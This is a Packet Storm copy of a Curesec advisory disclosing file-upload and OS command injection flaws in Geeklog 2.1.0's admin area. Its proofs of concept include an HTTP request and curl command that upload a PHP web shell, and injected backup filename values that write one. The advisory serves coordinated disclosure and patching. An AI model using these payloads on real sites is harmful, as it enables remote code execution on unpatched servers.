exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Geeklog 2.1.0 Command Injection

Geeklog 2.1.0 Command Injection
Posted Dec 9, 2015
Authored by Tim Coen | Site curesec.com

Geeklog version 2.1.0 suffers from a remote command injection vulnerability.

tags | exploit, remote
SHA-256 | 9862cfda9e37e8491628321364f663ba55f0f6c354b2b080cdc177f023d9abc9

Geeklog 2.1.0 Command Injection

Change Mirror Download
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Geeklog 2.1.0
Fixed in: 2.1.1b3
Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact: geeklog-security@lists.geeklog.net
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits Tim Coen of Curesec GmbH

2. Overview

The admin area of Geeklog suffers from two vulnerabilities that can lead to
code execution: OS Command Injection and Upload of Files with Dangerous Type.

The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1,
the OS command injection in version 2.1.1b3.

3. Upload of Files with Dangerous Type

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file type check is performed only client-side. An
attacker can easily bypass this check and thus upload files of dangerous types,
such as PHP files.

To upload files, an attacker needs a registered user that is in the group
"Filemanager Admin".

Proof of Concept


POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773
Cookie: [cookies]

-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="mode"

add
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"

/var/www/geeklog-2.1.0/public_html/images/
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="filepath"

test.png
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png

<?php passthru($_GET['x'])
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="upload"

Upload
-----------------------------10717364298700964751730232773--

As curl command:


curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773' \
-b 'gl_session=838973868; geeklog=2; password=18bdbd240593b81a5239285a1f56283b4ae20648;' \
--data-binary $'-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"mode\"\x0d\x0a\x0d\x0aadd\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"currentpath\"\x0d\x0a\x0d\x0a/var/www/geeklog-2.1.0/public_html/images/\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"filepath\"\x0d\x0a\x0d\x0atest.png\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"newfile\"; filename=\"shell.php\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a<?php passthru($_GET[\'x\'])\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0aUpload\x0d\x0a-----------------------------10717364298700964751730232773--\x0d\x0a' \
'http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'

4. OS Command Injection

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When performing a database backup, various settings are passed unsanitized to
exec, leading to code execution.

To exploit this issue, an attacker needs a registered user that is in the group
"Root".

Proof of Concept


1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "<?php passthru(\$_GET['x']);" > shell.php;"
2. Perform database backup here:
http://localhost/geeklog-2.1.0/public_html/admin/database.php
The injected commands will be executed.

In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command
injection is still possible, including the creation of a PHP shell by appending
the injected PHP code to an existing PHP file without closing tags:


geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"

Code


/admin/database.php
function dobackup()
{
[...]
if (!empty($_CONF['mysqldump_filename_mask'])) {
$filename_mask = strftime($_CONF['mysqldump_filename_mask']);
}
[...]
$backupfile = $_CONF['backup_path'] . $filename_mask;
[...]
$command .= " $_DB_name > \"$backupfile\"";
[...]
if ($canExec) {
exec($command);

5. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:

https://www.geeklog.net/filemgmt/visit.php/1156

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/17/2015 Reminded Vendor of disclosure date
11/17/2015 Vendor points to beta version and announces release
11/24/2015 Informed Vendor of insufficient fix in beta
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html

--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close